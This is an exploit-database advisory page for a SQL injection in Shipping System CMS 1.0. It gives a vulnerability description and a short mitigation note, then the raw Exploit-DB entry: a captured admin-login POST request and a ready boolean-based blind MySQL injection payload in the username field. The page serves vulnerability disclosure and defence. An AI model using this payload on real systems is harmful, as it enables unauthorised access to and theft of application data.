Shipping System CMS 1.0 - SQL Injection

vendor:

Shipping System CMS

by:

Özkan Mustafa Akkus (AkkuS)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Shipping System CMS

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:wecodex:shipping_system_cms

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2018

Shipping System CMS 1.0 – SQL Injection

Shipping System CMS 1.0 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application and execute arbitrary SQL commands in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use stored procedures and parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

# Exploit Title: Shipping System CMS 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-05-23
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor : Wecodex Solutions
# Vendor Homepage: https://www.wecodex.com/item/view/shipping-system-by-parcel-in-php-and-mysql/4
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.

# PoC : SQLi :
# Demo : https://Target/demos/sendpack/admin/

https://Target/demos/sendpack/admin/index.php?action=processlogin

POST /demos/sendpack/admin/index.php?action=processlogin HTTP/1.1
Host: www.wecodex.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://Target/demos/sendpack/admin/
Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
username=admin&password=123456


# Vulnerable Payload :
# Parameter: username (POST)
# Type: boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload: 

username=admin") RLIKE (SELECT (CASE WHEN (5737=5737) THEN
0x61646d696e ELSE 0x28 END)) AND ("YAQS"="YAQS&password=123456